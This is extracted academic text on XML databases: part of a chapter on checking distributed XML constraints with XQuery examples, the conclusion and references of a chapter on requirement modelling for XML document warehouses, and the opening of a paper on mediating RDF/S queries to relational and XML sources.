2. Case 1 (j ≠ m): This is the case where Cij corresponds to a site other than the one where the update is occurring. The generation of Cij in this case involves computing appropriate join conditions and applying arithmetic conditions on the XML literals and arithmetic literals associated with Sj. Hence Cij naturally achieves the exact same result as the XML literals and arithmetic literals associated with Sj.

3. Case 2 (j = m): This is the case where Cij corresponds to the site where the update is occurring. The generation of Cij in this case consists of two parts. Part 1 consists of information from the same site Sj — a trivial case (just like Case 1). Part 2 consists of acquiring information from a different site. For each such variable, a unique intermediate predicate is generated. IPs are XQueries that return the values of such variables by computing the appropriate joins and arithmetic conditions involving those variables. Hence, IPs guarantee correct information exchange from a different site. The reason we generate unique IPs is that we can either store all the IPs in a global directory such as the XMetadatabase or generate them at run time.

From steps 2 and 3, we observe that the conjunction of sub XConstraints Cij entails the global XConstraint Ci. Hence, if Ci determines whether an XUpdate violates the constraint, then the conjunction of its Cij's also determines whether the constraint Ci is violated. In other words, if the whole conjunction of Ci evaluates to false, constraint Ci is not violated; otherwise, Ci is violated.
Example 4.1

We illustrate the working of the algorithm on a sample healthdb.xml (refer to Figure 7) when intermediate predicates are not involved. In Figure 7, we show that a patient "John" (with SSN "123") is associated with two CaseIds, 1 and 3, and two treatments. Consider an XUpdate statement XU1 occurring on site S2:

XU1 = FOR $cl in document("healthdb.xml")/HEALTHDB/S2:CLAIMS
UPDATE $cl {
  INSERT <CLAIM>
           <CaseId>1</CaseId>
           <ClaimDate>03/05/2004</ClaimDate>
           <Amount>25000</Amount>
           <Type>Emergency</Type>
         </CLAIM>
}

Figure 7. A sample healthdb.xml document — PATIENTS: (123, John, B), (234, Clark, C); CASES: (1, 123, 10/14/2003), (2, 234, 06/24/2004), (3, 123, 10/12/2004); CLAIMS: (3, 11/14/2004, 40000, Inpatient); TREATMENTS: (1, Mike, 10/15/2003, SmallPox), (3, Blake, 10/14/2004, LegInjury)
Applying Steps 1-4 from the third section, we obtain:

XNVL = {/HEALTHDB/S2:CLAIMS/CLAIM(CaseId = 1, ClaimDate = '03/05/2004', Amount = 25000, Type = 'Emergency')}

XCST(C1) = <C1, (S1, S2, S3)>, where

C1:- (//S1:PATIENTS, (./PATIENT,[ssn=./SSN,healthplan=./HealthPlan])),
(//S1:CASES, (./CASE,[caseid=./CaseId,ssn=./SSN])),
(//S2:CLAIMS, (./CLAIM,[caseid=./CaseId,amount=./Amount])),
(//S3:TREATMENTS, (./TREATMENT,[caseid=./CaseId,disease=./Disease])),
healthplan = 'B', disease = 'SmallPox', amount > 40000.
/* C11 is generated from Algorithm 1 (lines 7-13) */
C11 = for $var1 in document("healthdb.xml")//S1_PATIENTS/PATIENT,
      for $var2 in document("healthdb.xml")//S1_CASES/CASE
      where $var1/SSN = $var2/SSN and $var2/CaseId = 1 and $var1/HealthPlan = "B"
      return 1

/* C12 is generated from Algorithm 1 (lines 14-26) */
C12 = return 1 if {1 = 1 and 25000 > 40000} else return 0

/* C13 is generated from Algorithm 1 (lines 7-13) */
C13 = for $var1 in document("healthdb.xml")//S3_TREATMENTS/TREATMENT
      where $var1/CaseId = 1 and $var1/Disease = "SmallPox"
      return 1

So, C1 = C11 ∧ C12 ∧ C13. In this example, C11 = 1 (true), C12 = 0 (false), and C13 = 1 (true). The conjunction of C11, C12, and C13 evaluates to false. Hence the update statement does not violate constraint C1 (from Theorem 4.1). Similarly:

C21 = for $var1 in document("healthdb.xml")//S1_PATIENTS/PATIENT,
      for $var2 in document("healthdb.xml")//S1_CASES/CASE
      where $var1/SSN = $var2/SSN and $var2/CaseId = 1 and $var1/HealthPlan = "B"
      return 1

C22 = return 1 if {1 = 1 and "Emergency" = "Emergency"} else return 0

So, C2 = C21 ∧ C22. In this example, C21 = 1 (true) and C22 = 1 (true). The conjunction of C21 and C22 evaluates to true. Hence the update statement violates constraint C2 (from Theorem 4.1). Note that C2 is defined in the second section.
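The acceptance decision of Example 4.1 can be reproduced in a few lines of Python; the function names are ours, and the 0/1 values stand for the locally evaluated sub XConstraints.

def violated(sub_results):
    """A global XConstraint Ci is violated iff the conjunction of its
    sub XConstraints Cij (each evaluated locally as 0 or 1) is true."""
    return all(sub_results)

def safe_to_update(constraints):
    """Execute the XUpdate only if it violates none of the affected
    constraints, so no rollback is ever needed."""
    return not any(violated(results) for results in constraints.values())

# Values from Example 4.1: C1 = C11 ∧ C12 ∧ C13 and C2 = C21 ∧ C22.
results = {"C1": [1, 0, 1], "C2": [1, 1]}
print(violated(results["C1"]))   # False -> C1 is not violated
print(violated(results["C2"]))   # True  -> C2 is violated
print(safe_to_update(results))   # False -> XU1 must be rejected

Because C1's conjunction is false while C2's is true, the update is rejected without ever being applied, which is exactly the no-rollback behaviour described above.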
Example 4.2

Here, we illustrate the generation of sub constraints when intermediate predicates are involved. For the example database given in Figure 7, consider C4, which states: "A patient's date of claim may not be earlier than his/her injury date." Constraint C4 can be expressed as:

C4:- (//S1:PATIENTS, (./PATIENT,[ssn=./SSN])),
(//S1:CASES, (./CASE,[caseid=./CaseId,ssn=./SSN,idate=./InjuryDate])),
(//S2:CLAIMS, (./CLAIM,[caseid=./CaseId,cdate=./ClaimDate])),
cdate >

Figure 4. The complete xFACT diagram (in UML), comprising document classes including Publ_Abstract, Publ_References, Publ_Person, Publ_Month, Publ_Day, Publ_City, Publ_Keywords, Publ_Chapter, Publ_Institute, Publ_Location, Publ_Time, and Publ_Section
Goal-Oriented Requirement Engineering for XML Document Warehouses
(CV). The CV in some cases may exist in a different document, which has no direct link with the immediately-related documents involved in a given query.
4. Sort an already-generated outcome of a query based on a subject factor value (SFV).
5. Retrieve elements' attribute values by merging two or more documents.

The different types of requirements featured above are identified individually but can be combined with one another, particularly when a requirement's specification acquires a highly complex structure. The illustration with the requirements follows, where we will show three examples of possible requirements extracted from our case study. Each of these requirements represents one or a combination of the several categories presented above.
Figure 5. VDim "Abstract_List" package contents — VDims: Abstract_List, Abstracts_By_Year, Abstracts_By_Keyword, Abstracts_By_Conference
Figure 7. XDW conceptual model (in UML) — the Proceedings (xFACT) repository with the VDims Conference_List, Abstract_List, Abstract_List_By_Author, Publication_List, Author_List, and Abs_Lst_By_Author_By_Year
Requirement 1: List of All Conference Names

In order to generate the required list of all the conference names, the proposed query would perform a search within the document Publ_Conference and, more specifically, will extract the values of the element Conf_Name. Figure 8a shows how this specific requirement is modelled, based on our
Figure 8. Figures 8(a) and 8(b): Requirement for the list of all conference names — (a) requirement notation to extract a group of values; (b) the notation implemented (high-level requirement "Conference Name List" connected to the XML document Publ_Conference and its element Conf_Name)
XDW requirement model, while Figure 8b shows how the actual notation is implemented according to the requirement's values. It is important to note the direct connection amongst the high dimension level and the document level.

Requirement 2: List of Full Authors' Details Based on Given Institute Name

It is required for all authors' details to be listed according to their associated institute, which for this requirement we use "La Trobe University." A simple association between the two documents, Publ_Authors and Publ_Institute, enables us to extract the required data. This case is a demonstration of an outcome derived from a query search based on a specific value from one document, which extracts all values from another document, indicating a dependent relationship. Here both document types (Figure 3a) are implemented (section on Document Level), of which the Publ_Institute is the stronger component, due to the fact that the list of authors to be retrieved is determined based on the given institute value. Figure 9a shows how the case of searching based on a specified value is modelled, and Figure 9b shows how the actual notation is implemented according to the requirement's values.

Requirement 3: List of Conference Names Sorted Chronologically With Cross-Reference to Authors' Details

This requirement is slightly more complex than the previous cases. It can be broken down further to simplify the process of gathering the required information. Firstly, the list of conference names (Requirement 1) is a straightforward search, which evolves within the Publ_Conference document. It is then required for the list to be displayed chronologically, which indicates that the subject factor value (SFV) applies in this case and takes the element value "Yr_Year"
Figure 9. Figures 9(a) and 9(b): Requirement for the list of authors' details originating from "La Trobe University" — (a) requirement notation to retrieve an entire document list based on a specific search context value (CV); (b) the notation implemented (Publ_Authors retrieved via Publ_Institute, Inst_Name, with the context value "La Trobe University")
of document “Year”. A third component to this requirement is to also include cross-referencing to authors’ details, which are to be retrieved from the document Publ_Authors. If we refer to complete xFACT diagram (Figure 4), it is indicated that the search is not bound to be only within documents with direct connections amongst them. Instead, at times it may be necessary to go through several intra-connections with external documents to obtain the required values. In Figure 10a in the high-level requirement, the symbol of sort and merge appears, meaning that the outcome is a result of merging two requirements where one or both has/have been sorted. Figure 10b also shows how a document list is retrieved based on a selected element’s attribute, then sorted based on a SFV and finally combined with another document list. The arrow between the documents is again present, as the extracted authors’ details must
correspond to the related conference. The concept of requirement elicitation is applied in this case: we are able to decompose the high-level requirement "Conference name list sorted chronologically with cross reference to author details" into two smaller sub-requirements, "Author list" and "Chronological conference list", which may also provide valuable information when considered either on their own or in combination with several other requirements. The approach of decomposing components aids in a better understanding of the context at hand and in discovering important factors which may not have been initially evident.
Figure 10. Figures 10(a) and 10(b): Chronological listing of conference names with cross-reference to authors' details — (a) requirement notation of the sort and merge of document lists; (b) the notation implemented (the high-level requirement "Conference Name List sorted chronologically with cross reference to author details" decomposed into the sub-requirements "Author List" [Publ_Authors] and "Chronological Conference List" [Publ_Conference, Conf_Name, sorted by the SFV Yr_Year])

CONCLUSION AND FUTURE WORK

Requirement engineering (RE) explores the ob-
jectives of various stakeholders and the activities carried out by the system. In regard to system objectives and system functionalities, in this chapter we examined one of the existing approaches — specifically the goal-oriented approach as illustrated in Dardenne et al. (1993). Generally, goal-oriented approaches until now have been mainly directed to assist in the development of software systems, as opposed to focussing on document warehouses involving XML-embedded structures. Based on this, we obtained and broadened the notion of this goal-modelling approach to XML document warehouses (XDW) to promote their structural design by identifying the data warehouse dimensions and the nature of the fact repository. We introduced concepts from our previous work (Nassis et al., 2004, 2005a, 2005b), where we presented a coherent way to integrate a conceptual design methodology to build a native XDW, which includes the XML FACT (xFACT) repository and the Virtual Dimensions (VDims). At this stage we concentrated only on the aspect of the data warehouse structure and design. Given the architecture of the XDW which consists of three levels: (1) Requirement level, (2) XML warehouse conceptual level and (3) Logical level, we focus on the first level by proposing the XDW requirement model. The main themes of our methodology are to: (1) capture requirements early in the design process; (2) understand the current requirements and further elicit these to promote new requirements; (3) illustrate the mapping of each stated requirement into a corresponding dimension of the XML document warehouse (XDW); (4) certify that the information required for the xFACT repository can be assembled from the information available in the XDW; and (5) ensure that the information necessary to construct a dimension is available or can be obtained from the xFACT repository. We identified the main characteristics comprising the requirement model and then proceeded to the precise and detailed terminology of the
components. Using as a basis the system context of our case study (Conference Publications), we extracted a number of sample requirements and applied these to our XDW requirement model in order to illustrate the concepts presented throughout. In the chapter we emphasized the importance of requirement validation and the availability of the necessary data that aid to requirement fulfilment. A significant issue that still needs to be addressed is checking for the consistency of requirements. This can be achieved by adding an enhanced annotation that will promote a basis for verifying requirement consistency. This process involves two major factors: (a) ensuring that the requirement presentation has sufficient annotation to capture all the constraints in a precise manner, and (b) the development of an algorithm that is capable of carrying out such consistency verification, specifically dealing with inheritance and recursion. One avenue that could be pursued is the use of a language such as Object Constraint Language (OCL) to annotate the requirements. Clearly, there are several more subject matters that deserve investigation. First, the development of formal semantics that automate the mapping between XML data and XDW schema will define views more precisely and hence support the incremental update of materialized views. Nowadays, the major challenge for any level of semi-structured data is its ability to be effectively searched. Given that the amount of content expands across an organization, locating specific resources becomes progressively more complex and time-consuming. Therefore, investigating performance issues upon query execution in relation to accessing the XDW will prove valuable. A significant aspect is the implementation of the XDW requirement modelling approach, which can be achieved by building a well-formulated empirical study. Also to be explored is the construction of a critical case study to evaluate and validate the application of the XDW requirement model for XML document warehouses (XDWs).
REFERENCES Abelló, A., Samos, J., & Saltor, F. (2001, November). Understanding facts in a multidimensional object-oriented model. Paper presented at the Fourth International Workshop on Data Warehousing and OLAP (DOLAP 2001), Atlanta, GA (pp. 32-39). Blazewicz, J., Kubiak, W., Morzy, T., & Marek, R. (2003). Handbook on data management in information systems. Berlin; New York: SpringerVerlag. Coad, P., & Yourdon, E. (1990). Object-oriented analysis (2nd ed.). Englewood Cliffs, NJ: Prentice Hall. Dardenne, A., Van-Lamsweerde, A., & Fickas, S. (1993). Goal-directed requirements acquisition. Science of Computer Programming, 20(1-2), 3-50. Dillon, T. S., & Tan, P. L. (1993). Object-oriented conceptual modelling. Australia: Prentice Hall. Elmasri, R., & Navathe, S. B. (2000). Fundamentals of database systems (3rd ed.). New York: Addison-Wesley. Fankhauser, P., & Klement, T. (2003, September 3-5). XML for data warehousing changes & challenges (extended abstract). Paper presented at the Fifth International Conference on Data Warehousing and Knowledge Discovery (DaWaK 2003), Prague, Czech Republic. Feng, L., Chang, E., & Dillon, T. S. (2002). A semantic network-based design methodology for XML documents. ACM Transactions on Information Systems, (TOIS), 20(4), 390-421. Feng, L., Chang, E., & Dillon, T. S. (2003). Schemata transformation of object-oriented conceptual models to XML.International Journal of Computer Systems Engineering (CSSE), 18(1), 45-60.
Feng, L., & Dillon, T. S. (2003). Using fuzzy linguistic representations to provide explanatory semantics for data warehouses. IEEE Transactions on Knowledge and Data Engineering (TOKDE), 15(1), 86-102. Golfarelli, M., Maio, D. & Rizzi, S. (1998). The dimensional fact model: A conceptual model for data warehouses. International Journal of Cooperative Information Systems (IJCIS), 7(23), 215-247. Guttag, J. V., & Horning, J. J. (1993). Larch: Language and tools for formal specification. New York: Springer-Verlag. Jacek, B., Wieslaw, K., Tadeusz, M., & Rusinkiewicz, M. (Eds). (2003). Handbook on data management in information systems. Berlin; New York: Springer. Jacobson, I. (1995). The use case construct in object-oriented software engineering. In John M. Carroll (Ed.). Scenario-based design: Envisioning work and technology in system development (pp. 309-336). New York: John Wiley & Sons. Jarke, M., & Pohl, K. (1993, December). Establishing visions in context: Towards a model of requirements processes. Paper presented at the Fourteenth International Conference on Information Systems, Orlando, FL. Jones, C. B. (1990). Systematic software development using VDM (2nd ed.). NJ: Prentice Hall. Kimball, R., & Ross, M. (2002). The data warehouse toolkit: The complete guide to dimensional modelling (2nd ed.). New York: Wiley. Lubars, M., Potts, C., & Richer, C. (1993, January). A review of the state of the practice in requirements modelling. Paper presented at the First International Symposium on Requirements Engineering (RE 1993), San Diego, CA. Lucie-Xyleme. (2001, July 16-18). Xyleme: A dynamic warehouse for XML data of the web.
Paper presented at the International Database Engineering & Applications Symposium (IDEAS 2001), Grenoble, France.
national Workshop on Ubiquitous Web Systems and Intelligence (UWSI 2005), Colocated with ICCSA 2005, Singapore.
Lujan-Mora, S., Trujillo, J., & Song I-Y. (2002a, September 30-October 4). Extending the UML for multidimensional modelling. Paper presented at the Fifth International Conference on the Unified Modeling Language and Its Applications (UL 2002), Dresden, Germany.
Nilsson, N. J. (1971). Problem solving methods in artificial intelligence. New York: McGraw Hill.
Lujan-Mora, S., Trujillo, J., & Song, I-Y. (2002b). Multidimensional modeling with UML package diagrams. Paper presented at the Twenty-First International Conference on Conceptual Modeling (ER 2002). McGraw, K., & Harbison, K. (1997). User centered requirements: The scenario-based engineering process. Mahwah, New Jersey: Lawrence Erlbaum Associates. Nassis, V., R.Rajugan, Dillon, T. S., & Rahayu, W. J. (2004, September 1-3). Conceptual design for XML document warehouses. Paper presented at the Sixth International Conference on Data Warehousing and Knowledge Discovery (DaWaK 2004), Zaragoza, Spain. Nassis, V., R.Rajugan, Dillon, T.S., & Rahayu, W. (2005a). Conceptual and systematic design approach for XML document warehouses. International Journal of Data Warehousing and Mining, 1(3), 63-87. Nassis, V., R.Rajugan, Rahayu, W., & Dillon, T.S. (2005b, July 25-28). A requirement engineering approach for designing XML-View driven, XML document warehouses. Paper presented at the Twenty-Ninth International Computer Software and Application Conference (COMPSAC 2005), Edinburgh, Scotland. Nassis, V., R.Rajugan, Rahayu, W., & Dillon, T.S. (2005c, May 9-12). A systematic design approach for XML-View driven web document warehouses. Paper presented at the First Inter-
Olle, T. W., Hagelstein, J., MacDonald, I. G., Rolland, C., Sol, H. G., Van Assche, F. J. V. et al. (1988). Information systems methodologies: A framework for understanding. New York; Reading, MA: Addison-Wesley. OMG-UML™ (2003). Unified Modeling Language™ (UML) Version 1.5, Specification. Object Management Group (OMG). Pokorny, J. (2002, June 3-6). XML data warehouse: Modelling and querying. Paper presented at the Fifth International Baltic Conference (Baltic DB & IS 2002), Talinn, Estonia. Rahayu, W. J., Dillon, T. S., Mohammad, S., & Taniar, D. (2001, August 21-24). Object-relational star schemas. Paper presented at the Thirteenth IASTED International Conference on Parallel & Distributed Computing and Systems (PDCS 2001), Anaheim, CA. Rajugan, R, Chang, E., Dillon, T. S., & Feng, L. (2003, September 1-5). XML views: Part I. Paper presented at the Fourteenth International Conference on Database and Expert Systems Applications (DEXA 2003), Prague, Czech Republic. Rajugan, R, Chang, E., Dillon, T. S. & Feng, L. (2004, November 2-6). XML views, part II: Modelling conceptual views using XSemantic nets. Paper presented at the Thirtieth Conference of the IEEE Industrial Electronics Society (IECON 2004), Workshop & Special Session on Industrial Informatics, S. Korea. Rajugan, R, Chang, E., Dillon, T. S., & Feng, L. (2005, May 24-28). XML views, Part III: Modeling XML conceptual views using UML. Paper presented at the Seventh International Confer-
ence on Enterprise Information Systems (ICEIS 2005), Miami, FL.
Spivey, J. M. (1992). The Z notation — A reference manual (2nd ed.). NJ: Prentice Hall.
Rahayu, W. J., Chang, E., Dillon, T. S., & Taniar, D. (2002). Aggregation versus association in object modeling and databases. Paper presented at the Seventh Australasian Conference on Information Systems, Hobart, Tasmania.
Trujillo, J., Palomar, M., Gomez, J., & Song, I-Y. (2001, December). Designing data warehouses with OO conceptual models. IEEE Computer Society, “Computer”, 66-75.
Rolland, C., & Prakash, N. (2000). From conceptual modelling to requirements engineering. Special issue of Annals of Software Engineering on Comparative Studies of Engineering Approaches for Software Engineering, 10(1-4), 51-176. Royce, W. W. (1970, August 25-28). Managing the development of large-scale software: Concepts and techniques. Paper presented at the Western Electronic Show and Convention (WesCon), LA. Rumbaugh, J. R., Blaha, M. R., Lorensen, W., Eddy, F., & Premerlani, W. (1991). Object-oriented modelling and design. Englewood Cliffs, NJ: Prentice Hall.
W3C-XML. (2004, February 4). Extensible markup language (XML) 1.0. (3rd ed.). Retrieved February 20, 2004, from http://www.w3.org/XML/ W3C-XQuery. (2004, November 2003). XQuery 1.0: An XML query language. Retrieved November 10, 2003, from http://www.w3.org/TR/xquery W3C-XSD. (2004). XML schema. Retrieved February 5, 2004, from http://www.w3.org/XML/ Schema Xyleme. (2001). Xyleme XML content management and business document management system. Retrieved December 10, 2004, from http://www. xyleme.com/ Yourdon, E. (1989). Modern structured analysis. Englewood Cliffs, NJ: Prentice Hall.
This work was previously published in Processing and Managing Complex Data for Decision Support Systems, edited by J. Darmont and O. Boussaid, pp. 28-62, copyright 2006 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 2.10
Mediating RDF/S Queries to Relational and XML Sources I. Koffina Institute of Computer Science & University of Crete, Greece G. Serfiotis Institute of Computer Science & University of Crete, Greece V. Christophides Institute of Computer Science & University of Crete, Greece V. Tannen University of Pennsylvania, USA
ABSTRACT Semantic Web (SW) technology aims to facilitate the integration of legacy data sources spread worldwide. Despite the plethora of SW languages (e.g., RDF/S, OWL) recently proposed for supporting large-scale information interoperation, the vast majority of legacy sources still rely on relational databases (RDB) published on the Web or corporate intranets as virtual XML. In this article, we advocate a first-order logic framework for mediating high-level queries to relational and/or XML sources using community ontologies expressed in a SW language such as RDF/S. We describe the architecture and reasoning services
of our SW integration middleware, termed SWIM, and we present the main design choices and techniques for supporting powerful mappings between different data models, as well as reformulation and optimization of queries expressed against mediator ontologies and views.
INTRODUCTION A cornerstone issue in the realization of the semantic Web (SW) vision is the achievement of large-scale interoperability among multiple information sources spread worldwide. In order to capture source semantics in a machine process-
able way, various ontology-based formalisms have been recently proposed (e.g., RDF/S (Manola & Miller, 2004), OWL (Harmelen & McGuiness, 2004)). However, the vast majority of existing legacy data are not yet in RDF/S or any other SW language (Lee & Goodwin, 2005). As a matter of fact, most of the data are physically stored in relational databases (RDB) and they are actually published on the Web as virtual XML. SW applications, however, require to view such data as valid instances of a virtual RDF/S ontology for a specific domain of discourse and to be able to manipulate them with high-level query and view languages (e.g., RQL (Karvounarakis, Alexaki, Christophides, Plexousakis, & Scholl, 2002) or RVL (Magkanaraki, Tannen, Christophides, & Plexousakis, 2003)). Such an ontology offers an intuitive conceptual interface to express queries, which can be easily reused and refined (compared to the relational or XML data models). Therefore, we need an expressive and flexible SW middleware to either publish RDB data directly as RDF, or republish XML as RDF, or—even better—be capable of doing both. A decade of experience with information integration architectures based on mediators (Cluet, Delobel, Simeon, & Smaga, 1998; Levy, Rajaraman, & Ordille, 1996; Papakonstantinou, Garcia-Molina, & Widom, 1995) suggests that it is highly beneficial to avoid costly intermediate data migrations, as well as to (semi)automatically generate such systems from succinct formal specifications, mapping directly local data to mediator ontologies (or schemas). This greatly enhances the maintainability and reliability of the publishing systems in an environment of often revised and shifting requirements.
MOTIVATING EXAMPLE Let’s assume two sources providing fine-art information as seen in Figure 1: the lower left handside represents a relational database (art.db), while the
lower right handside represents an XML document (art.xml) whose content is described by a DTD or an XML schema. In particular, art.db consists of three tables1: Artist(Name, Year of Birth, Nationality) that stores information about artists, Museum(Name, Address, Country) that stores information about museums, and Artifact(Title, Creator, Kind, Museum) that stores information about artifacts, their creator, and exhibition place. Moreover, document art. xml contains information about museums and their collections (of either paintings or sculptures). Each collection comprises artifacts along with information about their creator (either under the form of artist elements or references when they are introduced elsewhere in the document). On the top of Figure 1, we consider a publicly available RDF/S ontology in the cultural domain. This ontology is represented as a directed graph whose nodes denote the classes (e.g., Artist, Artifact) and edges denote the properties (e.g., Creates). The domain of a property is always a class (drawn as an oval), while the range may be a class or a literal (drawn as a rectangle). Subsumption relationships may be defined for both classes (e.g., Painter is a subclass of Artist) and properties (e.g., Paints is a subproperty of Creates). In this article, we propose a semantic Web integration middleware (SWIM) for virtually integrating relational and XML sources using RDF/S ontologies as depicted in Figure 1. In order to specify our data publishing services and reformulate on-the-fly mediator queries expressed against the RDF/S ontologies according to the syntax, structure, and semantics of local sources (see Table 1 for the translation of a query returning artifacts that are exhibited in the museum of Louvre), we rely on a uniform and expressive logic framework termed semantic Web logic framework (SWLF). More precisely, the main contributions of SWIM are: •
Logic framework: We advocate a first-order logic (FOL) representation of heterogeneous data models such as RDF/S, XML, and
Figure 1. Overview of the SWIM architecture
Table 1. The queries for the local sources and the one for the mediator ontology RQL SELECT x FROM {x}Exhibited.Denom{z} WHERE z = “Louvre” SQL
SELECT a.Title FROM Artifact a WHERE a.Museum= “Louvre”
XQuery FOR $var0 in document(“art.xml”)// Museum FOR $var1 in $var0/@Name FOR $var2 in $var0//Artifact/Title WHERE $var1/text()= “Louvre” RETURN $var2/text()
relational models (unlike existing SW middlewares Bizer, 2003; Cruz, Xiao, & Hsu, 2004; Klein, 2002; Korotkiy & Top, 2004; Reif, Jazayeri, & Gall, 2004; Xiao & Cruz, 2004) coercing data under a single model, namely RDF/S or OWL). In particular, we provide a uniform framework for capturing the semantics of specific ontologies and sources schemas involved in a SWIM mediator under the form of disjunctive embedded dependencies (DEDs) (Deutsch, 2002). DEDs are proven to be quite useful for capturing both RDF/S class (or property) subsumption relationships, as well as alternative mappings from sources schemas to the same RDF/S ontology fragments. Mapping rules: We rely on linear datalog (non-recursive datalog without negation) for specifying how a fragment (i.e., view) of a mediator ontology can be populated, on demand, with the data available in relevant local sources. Mapping rules, also interpreted as DEDs, adopt a GLAV approach (Friedman, Levy, & Millstein, 1999) to reconciliate the schematic, structural, and semantic discrepancies arising between the mediator and the sources, by both expressing an RDF/S ontology in terms of the local (XML or relational) schemas (i.e., GAV like Bizer (2003), Lehti and Fankhauser (2004), and Miklos & Sobernig, (2005)) and vice versa (i.e., LAV like Amann, Beeri, Fundulaki, and Scholl (2002), Benatallah, Hacid, Paik, Rey, and Toumani (2005), (Chen, Wu, Wang, and Mao (2006b), and Fundulaki, 2002)). These mappings are able to match any fragment (i.e., a view) of the RDF/S ontology to any view over the relational sources or any XML document fragment. Query mediation: We provide a sound and complete algorithm for reformulating expressive RQL/RVL queries/views issued against a virtual RDF/S ontology into optimal queries tailored to the syntax, schema,
and semantics of local sources. In particular, we rely on well-established semantic query optimization techniques (i.e., Chase/Backchase (Deutsch, Popa, & Tannen, 1999)) to determine a maximally-contained rewriting. Intuitively, such a rewriting approximates the best possible answer of the original query, which can be obtained given the set of the available rules that map the local sources to the mediator ontology. To the best of our knowledge, no other SW mediation systems have addressed reformulation issues for unions of conjunctive RDF/S queries in the presence of constraints (both at the mediator ontology and source schemas) under the form of DEDs.
SWIM LOGIC FRAMEWORK We advocate a logic-based framework that supports a semantic Web middleware for reformulating RQL queries addressed to RDF/S ontologies. This framework, termed semantic Web logic framework (SWLF), consists of first-order logic (FOL) predicates along with a set of appropriate constraints under the form of disjunctive embedded dependencies (DEDs). Definition 1. A disjunctive embedded dependency is a FOL formula of the following general ⎡ ( x ) → ∨l ∃ y ' ( x, y ) ⎤ x ∀ form: i i i ⎥ where x , yi are ⎢⎣ i =1 ⎦ tuples of variables and φ, φi’ are conjunctions of relational atoms of the form R(ω1, ..., ωl) and equality atoms of the form ω=ω’, where ω1, ..., ωl, ω, ω’ are variables or constants; φ may be the empty conjunction.
First-Order Logic RDF/S and XML Representation The FOL representation of an RDF/S ontology and description base consists of six predicates (see Table 2) and the following set of disjunction-free DEDs 2:
Table 2. First-order logic predicates for RDF Predicate CLASS PROP C_SUB P_SUB C_EXT P_EXT
•
• • •
• •
•
•
600
Type Set Set Set Set Set Set
Every resource in the extent of a class implies the existence of the corresponding class: ∀c,x C_EXT(c,x) → CLASS(c). The subclass relationship relates classes:∀a,b C_SUB(a,b) → CLASS(a) ∧ CLASS(b). The subclass relationship is reflexive: ∀c CLASS(c) → C_SUB(c,c). The subclass relationship is transitive: ∀a,c,e C_ SUB(e,c) ∧ C_ SUB(c,a) → C_SUB(e,a). The subclass relationship is antisymetric: ∀a,c C_SUB(a,c) ∧ C_SUB(c,a) → a=c. The domain and range of every property is a class: ∀a,p,b PROP(a,p,b) → CLASS(a) ∧ CLASS(b). The domain and range of every property is unique: ∀a,p,b,c,q d PROP(a,p,b) ∧ PROP(c,q,d) ∧ p=q → a=c ∧ b=d. In a valid RDF description schema the domain (range) of every subproperty is subsumed by the domain (range) of its superproperty: ∀a,p,b,c,q,d P_SUB(q,p) ∧ PROP(a,p,b) ∧ PROP(c,q,d) → C_SUB(c,a) ∧ C_SUB(d,b).
Description CLASS(c) iff c is a class PROP(a,p,b) iff p is a property having class a as domain and class b as range C_SUB(c,a) iff class c is a (direct or not) subclass of class a P_SUB(p,q) iff property p is a (direct or not) subproperty of property q C_EXT(c,x) iff resource x is in the proper extent (is a direct instance) of class c P_EXT(x,p,y) iff the ordered pair (x,y) (formed from resources x, y) is in the proper extent (is a direct instance) of property p
•
In a valid RDF description base the subject/object resources in every statement are (direct or indirect) instances of the property’s domain/range classes: ∀a,p,b,x,y PROP(a,p,b) ∧ P_ EXT(x,p,y) → ∃c,d C_SUB(c,a) ∧ C_SUB(d,b) ∧ C_EXT(c,x) ∧ C_EXT(d,y).
It should be stressed that, compared to the RDF/S semantics given in Hayes (2004), SWLF (i) distinguishes between the different RDF/S abstraction layers (data, schema, and metaschema), (ii) enforces that the domain and range of properties are always defined and unique, (iii) does not allow the existence of cycles in the class and property hierarchies, (iv) states that the set inclusion of the domain and range are preserved for specialized properties, and (v) requires that in each RDF statement the subject and object resources are (direct or not) instances of the domain and range classes of the property, respectively. These additional constraints are employed to effectively reason over queries/views (and not over data as in Hayes (2004)), while better clarifying
Mediating RDF/S Queries to Relational and XML Sources
the semantics of classes and properties in the mappings. Apart from the previous set of constraints capturing the semantics of the RDF/S data model, there exist two additional sets of constraints pertaining to a particular RDF/S ontology. The first3 provides only a partial knowledge of the ontology in the sense that it captures the existence of the RDF/S ontology’s classes, properties, and subsumption hierarchies, and includes constraints involving the predicates CLASS, PROP, C_SUB, and P_SUB. For example, for the RDF/S ontology given in Figure 1, the following constraints declare the existence of a class called Artist and a property called Creates with domain Artist and range Artifact, and the fact that Painter is a subclass of Artist, and that Paints is a subproperty of Creates: CLASS(Artist),PROP(Artist,Creates,Artifact), C_ SUB(Painter,Artist), & P_SUB(Paints,Creates)
The other set of constraints4 provides a complete knowledge of the mediator RDF/S ontology (see Figure 1). In particular, it states all the classes, properties, as well as their subsumption relationships5 as follows: •
Both sets of constraints are important to ensure the soundness and completeness of the core algorithms that we will present in the next section. In a similar way, we capture the semantics of the XML data sources: we consider a set of SWLF predicates and a set of DEDs preserving the semantics of XML data hierarchies. Briefly, these constraints (for details see Deutsch (2002)) ensure that (i) every child relationship is also a descendant relationship, (ii) the descendant relationship is reflexive, transitive, and antisymmetric, (iii) every XML document has only one root element, which cannot be descendant of another node, (iv) the child/descendant relationship is defined between two nodes, (v) the nodes have only one label and content, (vi) every node has only one parent, (vii) between two nodes with a child relationship there is no other node, and (viii) between two ancestors of a node there should exist a descendant relationship. Finally, the FOL representation of the relational data is straightforward: every source relation is a new SWLF predicate and the integrity constraints (if any) are DEDs defined over these predicates.
RDF/S Query Patterns and Their Translation into SWLF In our work, we are interested in translating the navigation/filtering patterns of classes (e.g., $c{x; $d}) and properties (e.g., {x; $c}@{y; $d}) supported by expressive RDF/S query languages such as RQL (Haase, Broekstra, Eberhart, & Volz, 2004). It is worth mentioning that these core RQL patterns can’t be expressed to the emerging SPARQL6 standard unless the involved inference rules (i.e., RDF/S Semantics (Hayes, 2004)) are fully materialized for a given RDF/S schema (Serfiotis, Koffina, Christophides, & Tannen, 2005). Definition 2. An RQL conjunctive query is a FOL formula of the following form:
601
Mediating RDF/S Queries to Relational and XML Sources
Q(u ) : −..., Ei (ui ),..., um = un
and after the substitution of the patterns with the SWLF predicates we get:
